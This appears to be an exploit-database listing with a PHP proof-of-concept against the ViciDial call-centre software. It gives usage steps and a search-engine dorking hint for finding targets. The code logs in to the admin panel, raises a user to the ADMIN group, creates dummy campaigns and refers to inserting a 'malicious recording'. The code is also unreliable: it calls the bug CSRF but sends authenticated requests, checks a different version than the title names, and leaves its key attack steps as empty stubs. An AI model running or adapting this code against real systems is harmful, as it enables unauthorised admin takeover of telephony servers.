Share
## https://sploitus.com/exploit?id=PACKETSTORM:181984
=============================================================================================================================================  
| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following php code add new admin .  
  
[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )  
  
[+] save code as poc.php .  
  
[+] USage : cmd = php poc.php .  
  
[+] PayLoad :  
  
  
<?php  
class VICIdialExploit {  
private $username;  
private $password;  
private $targetUri;  
private $headers;  
  
public function __construct($username, $password, $targetUri) {  
$this->username = $username;  
$this->password = $password;  
$this->targetUri = $targetUri;  
$this->headers = array(  
'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)  
);  
}  
  
public function check() {  
$response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');  
if ($response['code'] != 200) {  
return 'Unknown';  
}  
  
$version_info = $this->extractVersion($response['body']);  
if (!$version_info) {  
return 'Unknown';  
}  
  
$current_version = $this->compareVersion($version_info, '2.14-917a');  
return ($current_version <= 0) ? 'Vulnerable' : 'Safe';  
}  
  
private function extractVersion($html) {  
preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);  
return isset($matches[0]) ? $matches[0] : null;  
}  
  
private function compareVersion($current, $vulnerable) {  
return version_compare($current, $vulnerable);  
}  
  
public function exploit() {  
$this->startService();  
$this->authenticateAdmin();  
$this->updateUserSettings();  
$this->updateSystemSettings();  
$campaignData = $this->createDummyCampaign();  
$this->updateCampaignSettings($campaignData['id']);  
$this->createDummyList($campaignData['list_name'], $campaignData['id']);  
$phoneCreds = $this->fetchPhoneCredentials();  
$this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);  
$this->insertMaliciousRecording($phoneCreds['recording_extension']);  
$this->deleteDummyCampaign($campaignData['id']);  
$this->waitForCronJob();  
}  
  
private function startService() {  
// Starting HTTP service logic  
}  
  
private function sendRequest($method, $url, $body = null) {  
$options = array(  
'http' => array(  
'method' => $method,  
'header' => implode("\r\n", $this->headers)  
)  
);  
if ($body) {  
$options['http']['content'] = http_build_query($body);  
}  
$context = stream_context_create($options);  
$result = file_get_contents($url, false, $context);  
  
return array(  
'code' => $http_response_header[0],  
'body' => $result  
);  
}  
  
private function authenticateAdmin() {  
$response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));  
if ($response['code'] != 200) {  
throw new Exception('Failed to authenticate with credentials.');  
}  
echo 'Authenticated successfully as user ' . $this->username;  
}  
  
private function updateUserSettings() {  
$faker = new Faker\Generator();  
$userSettings = array(  
'ADD' => '4A',  
'user' => $this->username,  
'pass' => $this->password,  
'full_name' => $faker->name,  
'user_group' => 'ADMIN',  
'phone_login' => $faker->userName,  
'phone_pass' => $faker->password,  
'active' => 'Y',  
'vicidial_recording' => '1'  
);  
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);  
echo 'Updated user settings';  
}  
  
private function updateSystemSettings() {  
// Fetching system settings logic and making changes  
}  
  
private function createDummyCampaign() {  
$faker = new Faker\Generator();  
$campaignId = rand(100000, 999999);  
$listId = $campaignId + 1;  
$campaignName = $faker->company;  
  
$campaignSettings = array(  
'ADD' => '21',  
'campaign_id' => $campaignId,  
'campaign_name' => $campaignName,  
'user_group' => '---ALL---',  
'active' => 'Y'  
);  
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);  
echo 'Created dummy campaign ' . $campaignName;  
  
return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);  
}  
  
private function updateCampaignSettings($campaignId) {  
$campaignSettings = array(  
'ADD' => '41',  
'campaign_id' => $campaignId,  
'active' => 'Y',  
'auto_dial_level' => '1'  
);  
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);  
echo 'Updated dummy campaign settings';  
}  
  
private function createDummyList($listName, $campaignId) {  
$listSettings = array(  
'ADD' => '211',  
'list_name' => $listName,  
'campaign_id' => $campaignId,  
'active' => 'Y'  
);  
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);  
echo 'Created dummy list ' . $listName;  
}  
  
private function fetchPhoneCredentials() {  
// Fetching phone credentials logic  
}  
  
private function agentPortalAuthentication($extension, $password, $campaignId) {  
// Agent portal authentication logic  
}  
  
private function insertMaliciousRecording($recordingExtension) {  
// Inserting malicious recording logic  
}  
  
private function deleteDummyCampaign($campaignId) {  
$this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));  
echo 'Deleted dummy campaign ' . $campaignId;  
}  
  
private function waitForCronJob() {  
// Waiting for cron job logic  
}  
}  
  
// Usage example:  
$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');  
$exploit->check();  
$exploit->exploit();  
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================